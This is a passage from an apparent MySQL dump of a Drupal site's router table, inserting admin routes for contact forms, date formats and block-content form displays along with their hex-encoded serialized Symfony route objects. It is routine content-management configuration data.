303b613a323a7b693a303b733a343a2274657874223b693a313b733a373a222f64656c657465223b7d693a313b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a31323a22636f6e746163745f666f726d223b693a343b623a313b7d693a323b613a323a7b693a303b733a343a2274657874223b693a313b733a33313a222f61646d696e2f7374727563747572652f636f6e746163742f6d616e616765223b7d7d733a393a22706174685f76617273223b613a313a7b693a303b733a31323a22636f6e746163745f666f726d223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a36313b733a31343a227061747465726e4f75746c696e65223b733a34303a222f61646d696e2f7374727563747572652f636f6e746163742f6d616e6167652f252f64656c657465223b733a383a226e756d5061727473223b693a363b7d7d, 6);
INSERT INTO `router` (`name`, `path`, `pattern_outline`, `fit`, `route`, `number_parts`) VALUES
('entity.contact_form.edit_form', '/admin/structure/contact/manage/{contact_form}', '/admin/structure/contact/manage/%', 30, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a34363a222f61646d696e2f7374727563747572652f636f6e746163742f6d616e6167652f7b636f6e746163745f666f726d7d223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a31323a225f656e746974795f666f726d223b733a31373a22636f6e746163745f666f726d2e65646974223b733a363a225f7469746c65223b733a31373a224564697420636f6e7461637420666f726d223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a31343a225f656e746974795f616363657373223b733a31393a22636f6e746163745f666f726d2e757064617465223b7d733a373a226f7074696f6e73223b613a353a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a343a2275746638223b623a313b733a31303a22706172616d6574657273223b613a313a7b733a31323a22636f6e746163745f666f726d223b613a323a7b733a343a2274797065223b733a31393a22656e746974793a636f6e746163745f666f726d223b733a393a22636f6e766572746572223b733a36333a2264727570616c2e70726f78795f6f726967696e616c5f736572766963652e706172616d636f6e7665727465722e636f6e666967656e746974795f61646d696e223b7d7d733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a31393a226163636573735f636865636b2e656e74697479223b7d7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a323a7b693a303b733a333a22474554223b693a313b733a343a22504f5354223b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a313a7b693a303b733a31323a22636f6e746163745f666f726d223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a36333a227b5e2f61646d696e2f7374727563747572652f636f6e746163742f6d616e6167652f283f503c636f6e746163745f666f726d3e5b5e2f5d2b2b29247d734475223b733a31313a22706174685f746f6b656e73223b613a323a7b693a303b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a31323a22636f6e746163745f666f726d223b693a343b623a313b7d693a313b613a323a7b693a303b733a343a2274657874223b693a313b733a33313a222f61646d696e2f7374727563747572652f636f6e746163742f6d616e616765223b7d7d733a393a22706174685f76617273223b613a313a7b693a303b733a31323a22636f6e746163745f666f726d223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a33303b733a31343a227061747465726e4f75746c696e65223b733a33333a222f61646d696e2f7374727563747572652f636f6e746163742f6d616e6167652f25223b733a383a226e756d5061727473223b693a353b7d7d, 5),
('entity.contact_form.entity_permissions_form', '/admin/structure/contact/manage/{contact_form}/permissions', '/admin/structure/contact/manage/%/permissions', 61, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a35383a222f61646d696e2f7374727563747572652f636f6e746163742f6d616e6167652f7b636f6e746163745f666f726d7d2f7065726d697373696f6e73223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a343a7b733a363a225f7469746c65223b733a31383a224d616e616765207065726d697373696f6e73223b733a353a225f666f726d223b733a33383a2244727570616c5c757365725c466f726d5c456e746974795065726d697373696f6e73466f726d223b733a31343a22656e746974795f747970655f6964223b733a31353a22636f6e746163745f6d657373616765223b733a31383a2262756e646c655f656e746974795f74797065223b733a31323a22636f6e746163745f666f726d223b7d733a31323a22726571756972656d656e7473223b613a323a7b733a31313a225f7065726d697373696f6e223b733a32323a2261646d696e6973746572207065726d697373696f6e73223b733a31343a225f637573746f6d5f616363657373223b733a34373a225c44727570616c5c757365725c466f726d5c456e746974795065726d697373696f6e73466f726d3a3a616363657373223b7d733a373a226f7074696f6e73223b613a363a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a393a225f6669656c645f7569223b623a313b733a31303a22706172616d6574657273223b613a313a7b733a31323a22636f6e746163745f666f726d223b613a333a7b733a343a2274797065223b733a31393a22656e746974793a636f6e746163745f666f726d223b733a32313a22776974685f636f6e6669675f6f7665727269646573223b623a313b733a393a22636f6e766572746572223b733a32313a22706172616d636f6e7665727465722e656e74697479223b7d7d733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a323a7b693a303b733a32333a226163636573735f636865636b2e7065726d697373696f6e223b693a313b733a31393a226163636573735f636865636b2e637573746f6d223b7d733a343a2275746638223b623a313b7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a323a7b693a303b733a333a22474554223b693a313b733a343a22504f5354223b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a313a7b693a303b733a31323a22636f6e746163745f666f726d223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a37353a227b5e2f61646d696e2f7374727563747572652f636f6e746163742f6d616e6167652f283f503c636f6e746163745f666f726d3e5b5e2f5d2b2b292f7065726d697373696f6e73247d734475223b733a31313a22706174685f746f6b656e73223b613a333a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a31323a222f7065726d697373696f6e73223b7d693a313b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a31323a22636f6e746163745f666f726d223b693a343b623a313b7d693a323b613a323a7b693a303b733a343a2274657874223b693a313b733a33313a222f61646d696e2f7374727563747572652f636f6e746163742f6d616e616765223b7d7d733a393a22706174685f76617273223b613a313a7b693a303b733a31323a22636f6e746163745f666f726d223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a36313b733a31343a227061747465726e4f75746c696e65223b733a34353a222f61646d696e2f7374727563747572652f636f6e746163742f6d616e6167652f252f7065726d697373696f6e73223b733a383a226e756d5061727473223b693a363b7d7d, 6),
('entity.contact_message.field_ui_fields', '/admin/structure/contact/manage/{contact_form}/fields', '/admin/structure/contact/manage/%/fields', 61, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a35333a222f61646d696e2f7374727563747572652f636f6e746163742f6d616e6167652f7b636f6e746163745f666f726d7d2f6669656c6473223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a343a7b733a31313a225f636f6e74726f6c6c6572223b733a36323a225c44727570616c5c6669656c645f75695c436f6e74726f6c6c65725c4669656c64436f6e6669674c697374436f6e74726f6c6c65723a3a6c697374696e67223b733a363a225f7469746c65223b733a31333a224d616e616765206669656c6473223b733a31343a22656e746974795f747970655f6964223b733a31353a22636f6e746163745f6d657373616765223b733a363a2262756e646c65223b733a303a22223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a31313a225f7065726d697373696f6e223b733a33333a2261646d696e697374657220636f6e746163745f6d657373616765206669656c6473223b7d733a373a226f7074696f6e73223b613a363a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a343a2275746638223b623a313b733a31303a22706172616d6574657273223b613a313a7b733a31323a22636f6e746163745f666f726d223b613a323a7b733a343a2274797065223b733a31393a22656e746974793a636f6e746163745f666f726d223b733a393a22636f6e766572746572223b733a36333a2264727570616c2e70726f78795f6f726967696e616c5f736572766963652e706172616d636f6e7665727465722e636f6e666967656e746974795f61646d696e223b7d7d733a393a225f6669656c645f7569223b623a313b733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a32333a226163636573735f636865636b2e7065726d697373696f6e223b7d7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a303a7b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a313a7b693a303b733a31323a22636f6e746163745f666f726d223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a37303a227b5e2f61646d696e2f7374727563747572652f636f6e746163742f6d616e6167652f283f503c636f6e746163745f666f726d3e5b5e2f5d2b2b292f6669656c6473247d734475223b733a31313a22706174685f746f6b656e73223b613a333a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a373a222f6669656c6473223b7d693a313b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a31323a22636f6e746163745f666f726d223b693a343b623a313b7d693a323b613a323a7b693a303b733a343a2274657874223b693a313b733a33313a222f61646d696e2f7374727563747572652f636f6e746163742f6d616e616765223b7d7d733a393a22706174685f76617273223b613a313a7b693a303b733a31323a22636f6e746163745f666f726d223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a36313b733a31343a227061747465726e4f75746c696e65223b733a34303a222f61646d696e2f7374727563747572652f636f6e746163742f6d616e6167652f252f6669656c6473223b733a383a226e756d5061727473223b693a363b7d7d, 6),
('entity.date_format.collection', '/admin/config/regional/date-time', '/admin/config/regional/date-time', 15, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a33323a222f61646d696e2f636f6e6669672f726567696f6e616c2f646174652d74696d65223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a31323a225f656e746974795f6c697374223b733a31313a22646174655f666f726d6174223b733a363a225f7469746c65223b733a32313a224461746520616e642074696d6520666f726d617473223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a31313a225f7065726d697373696f6e223b733a32393a2261646d696e6973746572207369746520636f6e66696775726174696f6e223b7d733a373a226f7074696f6e73223b613a343a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a343a2275746638223b623a313b733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a32333a226163636573735f636865636b2e7065726d697373696f6e223b7d7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a323a7b693a303b733a333a22474554223b693a313b733a343a22504f5354223b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a303a7b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a34303a227b5e2f61646d696e2f636f6e6669672f726567696f6e616c2f646174655c2d74696d65247d734475223b733a31313a22706174685f746f6b656e73223b613a313a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a33323a222f61646d696e2f636f6e6669672f726567696f6e616c2f646174652d74696d65223b7d7d733a393a22706174685f76617273223b613a303a7b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a31353b733a31343a227061747465726e4f75746c696e65223b733a33323a222f61646d696e2f636f6e6669672f726567696f6e616c2f646174652d74696d65223b733a383a226e756d5061727473223b693a343b7d7d, 4),
('entity.date_format.config_translation_overview', '/admin/config/regional/date-time/formats/manage/{date_format}/translate', '/admin/config/regional/date-time/formats/manage/%/translate', 253, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a37313a222f61646d696e2f636f6e6669672f726567696f6e616c2f646174652d74696d652f666f726d6174732f6d616e6167652f7b646174655f666f726d61747d2f7472616e736c617465223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a31313a225f636f6e74726f6c6c6572223b733a37353a225c44727570616c5c636f6e6669675f7472616e736c6174696f6e5c436f6e74726f6c6c65725c436f6e6669675472616e736c6174696f6e436f6e74726f6c6c65723a3a6974656d50616765223b733a393a22706c7567696e5f6964223b733a31313a22646174655f666f726d6174223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a33353a225f636f6e6669675f7472616e736c6174696f6e5f6f766572766965775f616363657373223b733a343a2254525545223b7d733a373a226f7074696f6e73223b613a353a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a31303a22706172616d6574657273223b613a313a7b733a31313a22646174655f666f726d6174223b613a323a7b733a343a2274797065223b733a31383a22656e746974793a646174655f666f726d6174223b733a393a22636f6e766572746572223b733a36333a2264727570616c2e70726f78795f6f726967696e616c5f736572766963652e706172616d636f6e7665727465722e636f6e666967656e746974795f61646d696e223b7d7d733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a33343a22636f6e6669675f7472616e736c6174696f6e2e6163636573732e6f76657276696577223b7d733a343a2275746638223b623a313b7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a303a7b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a313a7b693a303b733a31313a22646174655f666f726d6174223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a38393a227b5e2f61646d696e2f636f6e6669672f726567696f6e616c2f646174655c2d74696d652f666f726d6174732f6d616e6167652f283f503c646174655f666f726d61743e5b5e2f5d2b2b292f7472616e736c617465247d734475223b733a31313a22706174685f746f6b656e73223b613a333a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a31303a222f7472616e736c617465223b7d693a313b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a31313a22646174655f666f726d6174223b693a343b623a313b7d693a323b613a323a7b693a303b733a343a2274657874223b693a313b733a34373a222f61646d696e2f636f6e6669672f726567696f6e616c2f646174652d74696d652f666f726d6174732f6d616e616765223b7d7d733a393a22706174685f76617273223b613a313a7b693a303b733a31313a22646174655f666f726d6174223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a3235333b733a31343a227061747465726e4f75746c696e65223b733a35393a222f61646d696e2f636f6e6669672f726567696f6e616c2f646174652d74696d652f666f726d6174732f6d616e6167652f252f7472616e736c617465223b733a383a226e756d5061727473223b693a383b7d7d, 8),
('entity.date_format.delete_form', '/admin/config/regional/date-time/formats/manage/{date_format}/delete', '/admin/config/regional/date-time/formats/manage/%/delete', 253, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a36383a222f61646d696e2f636f6e6669672f726567696f6e616c2f646174652d74696d652f666f726d6174732f6d616e6167652f7b646174655f666f726d61747d2f64656c657465223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a31323a225f656e746974795f666f726d223b733a31383a22646174655f666f726d61742e64656c657465223b733a363a225f7469746c65223b733a31383a2244656c657465206461746520666f726d6174223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a31343a225f656e746974795f616363657373223b733a31383a22646174655f666f726d61742e64656c657465223b7d733a373a226f7074696f6e73223b613a353a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a343a2275746638223b623a313b733a31303a22706172616d6574657273223b613a313a7b733a31313a22646174655f666f726d6174223b613a323a7b733a343a2274797065223b733a31383a22656e746974793a646174655f666f726d6174223b733a393a22636f6e766572746572223b733a36333a2264727570616c2e70726f78795f6f726967696e616c5f736572766963652e706172616d636f6e7665727465722e636f6e666967656e746974795f61646d696e223b7d7d733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a31393a226163636573735f636865636b2e656e74697479223b7d7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a323a7b693a303b733a333a22474554223b693a313b733a343a22504f5354223b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a313a7b693a303b733a31313a22646174655f666f726d6174223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a38363a227b5e2f61646d696e2f636f6e6669672f726567696f6e616c2f646174655c2d74696d652f666f726d6174732f6d616e6167652f283f503c646174655f666f726d61743e5b5e2f5d2b2b292f64656c657465247d734475223b733a31313a22706174685f746f6b656e73223b613a333a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a373a222f64656c657465223b7d693a313b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a31313a22646174655f666f726d6174223b693a343b623a313b7d693a323b613a323a7b693a303b733a343a2274657874223b693a313b733a34373a222f61646d696e2f636f6e6669672f726567696f6e616c2f646174652d74696d652f666f726d6174732f6d616e616765223b7d7d733a393a22706174685f76617273223b613a313a7b693a303b733a31313a22646174655f666f726d6174223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a3235333b733a31343a227061747465726e4f75746c696e65223b733a35363a222f61646d696e2f636f6e6669672f726567696f6e616c2f646174652d74696d652f666f726d6174732f6d616e6167652f252f64656c657465223b733a383a226e756d5061727473223b693a383b7d7d, 8),
('entity.date_format.edit_form', '/admin/config/regional/date-time/formats/manage/{date_format}', '/admin/config/regional/date-time/formats/manage/%', 126, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a36313a222f61646d696e2f636f6e6669672f726567696f6e616c2f646174652d74696d652f666f726d6174732f6d616e6167652f7b646174655f666f726d61747d223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a31323a225f656e746974795f666f726d223b733a31363a22646174655f666f726d61742e65646974223b733a363a225f7469746c65223b733a31363a2245646974206461746520666f726d6174223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a31343a225f656e746974795f616363657373223b733a31383a22646174655f666f726d61742e757064617465223b7d733a373a226f7074696f6e73223b613a353a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a343a2275746638223b623a313b733a31303a22706172616d6574657273223b613a313a7b733a31313a22646174655f666f726d6174223b613a323a7b733a343a2274797065223b733a31383a22656e746974793a646174655f666f726d6174223b733a393a22636f6e766572746572223b733a36333a2264727570616c2e70726f78795f6f726967696e616c5f736572766963652e706172616d636f6e7665727465722e636f6e666967656e746974795f61646d696e223b7d7d733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a31393a226163636573735f636865636b2e656e74697479223b7d7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a323a7b693a303b733a333a22474554223b693a313b733a343a22504f5354223b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a313a7b693a303b733a31313a22646174655f666f726d6174223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a37393a227b5e2f61646d696e2f636f6e6669672f726567696f6e616c2f646174655c2d74696d652f666f726d6174732f6d616e6167652f283f503c646174655f666f726d61743e5b5e2f5d2b2b29247d734475223b733a31313a22706174685f746f6b656e73223b613a323a7b693a303b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a31313a22646174655f666f726d6174223b693a343b623a313b7d693a313b613a323a7b693a303b733a343a2274657874223b693a313b733a34373a222f61646d696e2f636f6e6669672f726567696f6e616c2f646174652d74696d652f666f726d6174732f6d616e616765223b7d7d733a393a22706174685f76617273223b613a313a7b693a303b733a31313a22646174655f666f726d6174223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a3132363b733a31343a227061747465726e4f75746c696e65223b733a34393a222f61646d696e2f636f6e6669672f726567696f6e616c2f646174652d74696d652f666f726d6174732f6d616e6167652f25223b733a383a226e756d5061727473223b693a373b7d7d, 7),
('entity.entity_form_display.block_content.default', '/admin/structure/block-content/manage/{block_content_type}/form-display', '/admin/structure/block-content/manage/%/form-display', 61, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a37313a222f61646d696e2f7374727563747572652f626c6f636b2d636f6e74656e742f6d616e6167652f7b626c6f636b5f636f6e74656e745f747970657d2f666f726d2d646973706c6179223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a353a7b733a31323a225f656e746974795f666f726d223b733a32343a22656e746974795f666f726d5f646973706c61792e65646974223b733a363a225f7469746c65223b733a31393a224d616e61676520666f726d20646973706c6179223b733a31343a22666f726d5f6d6f64655f6e616d65223b733a373a2264656661756c74223b733a31343a22656e746974795f747970655f6964223b733a31333a22626c6f636b5f636f6e74656e74223b733a363a2262756e646c65223b733a303a22223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a32363a225f6669656c645f75695f666f726d5f6d6f64655f616363657373223b733a33373a2261646d696e697374657220626c6f636b5f636f6e74656e7420666f726d20646973706c6179223b7d733a373a226f7074696f6e73223b613a363a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a31303a22706172616d6574657273223b613a313a7b733a31383a22626c6f636b5f636f6e74656e745f74797065223b613a323a7b733a343a2274797065223b733a32353a22656e746974793a626c6f636b5f636f6e74656e745f74797065223b733a393a22636f6e766572746572223b733a36333a2264727570616c2e70726f78795f6f726967696e616c5f736572766963652e706172616d636f6e7665727465722e636f6e666967656e746974795f61646d696e223b7d7d733a31323a225f61646d696e5f726f757465223b623a313b733a393a225f6669656c645f7569223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a33313a226163636573735f636865636b2e6669656c645f75692e666f726d5f6d6f6465223b7d733a343a2275746638223b623a313b7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a303a7b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a313a7b693a303b733a31383a22626c6f636b5f636f6e74656e745f74797065223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a39303a227b5e2f61646d696e2f7374727563747572652f626c6f636b5c2d636f6e74656e742f6d616e6167652f283f503c626c6f636b5f636f6e74656e745f747970653e5b5e2f5d2b2b292f666f726d5c2d646973706c6179247d734475223b733a31313a22706174685f746f6b656e73223b613a333a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a31333a222f666f726d2d646973706c6179223b7d693a313b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a31383a22626c6f636b5f636f6e74656e745f74797065223b693a343b623a313b7d693a323b613a323a7b693a303b733a343a2274657874223b693a313b733a33373a222f61646d696e2f7374727563747572652f626c6f636b2d636f6e74656e742f6d616e616765223b7d7d733a393a22706174685f76617273223b613a313a7b693a303b733a31383a22626c6f636b5f636f6e74656e745f74797065223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a36313b733a31343a227061747465726e4f75746c696e65223b733a35323a222f61646d696e2f7374727563747572652f626c6f636b2d636f6e74656e742f6d616e6167652f252f666f726d2d646973706c6179223b733a383a226e756d5061727473223b693a363b7d7d, 6),
('entity.entity_form_display.block_content.default.bc', '/admin/structure/block/block-content/manage/{block_content_type}/form-display', '/admin/structure/block/block-content/manage/%/form-display', 125, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a37373a222f61646d696e2f7374727563747572652f626c6f636b2f626c6f636b2d636f6e74656e742f6d616e6167652f7b626c6f636b5f636f6e74656e745f747970657d2f666f726d2d646973706c6179223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a353a7b733a363a225f7469746c65223b733a31393a224d616e61676520666f726d20646973706c6179223b733a31343a22666f726d5f6d6f64655f6e616d65223b733a373a2264656661756c74223b733a31343a22656e746974795f747970655f6964223b733a31333a22626c6f636b5f636f6e74656e74223b733a363a2262756e646c65223b733a303a22223b733a31313a225f636f6e74726f6c6c6572223b733a38313a225c44727570616c5c626c6f636b5f636f6e74656e745c436f6e74726f6c6c65725c426c6f636b436f6e74656e74436f6e74726f6c6c65723a3a626c6f636b436f6e74656e74547970655265646972656374223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a32363a225f6669656c645f75695f666f726d5f6d6f64655f616363657373223b733a33373a2261646d696e697374657220626c6f636b5f636f6e74656e7420666f726d20646973706c6179223b7d733a373a226f7074696f6e73223b613a363a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a31303a22706172616d6574657273223b613a313a7b733a31383a22626c6f636b5f636f6e74656e745f74797065223b613a323a7b733a343a2274797065223b733a32353a22656e746974793a626c6f636b5f636f6e74656e745f74797065223b733a393a22636f6e766572746572223b733a36333a2264727570616c2e70726f78795f6f726967696e616c5f736572766963652e706172616d636f6e7665727465722e636f6e666967656e746974795f61646d696e223b7d7d733a31323a225f61646d696e5f726f757465223b623a313b733a393a225f6669656c645f7569223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a33313a226163636573735f636865636b2e6669656c645f75692e666f726d5f6d6f6465223b7d733a343a2275746638223b623a313b7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a303a7b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a313a7b693a303b733a31383a22626c6f636b5f636f6e74656e745f74797065223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a39363a227b5e2f61646d696e2f7374727563747572652f626c6f636b2f626c6f636b5c2d636f6e74656e742f6d616e6167652f283f503c626c6f636b5f636f6e74656e745f747970653e5b5e2f5d2b2b292f666f726d5c2d646973706c6179247d734475223b733a31313a22706174685f746f6b656e73223b613a333a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a31333a222f666f726d2d646973706c6179223b7d693a313b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a31383a22626c6f636b5f636f6e74656e745f74797065223b693a343b623a313b7d693a323b613a323a7b693a303b733a343a2274657874223b693a313b733a34333a222f61646d696e2f7374727563747572652f626c6f636b2f626c6f636b2d636f6e74656e742f6d616e616765223b7d7d733a393a22706174685f76617273223b613a313a7b693a303b733a31383a22626c6f636b5f636f6e74656e745f74797065223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a3132353b733a31343a227061747465726e4f75746c696e65223b733a35383a222f61646d696e2f7374727563747572652f626c6f636b2f626c6f636b2d636f6e74656e742f6d616e6167652f252f666f726d2d646973706c6179223b733a383a226e756d5061727473223b693a373b7d7d, 7),
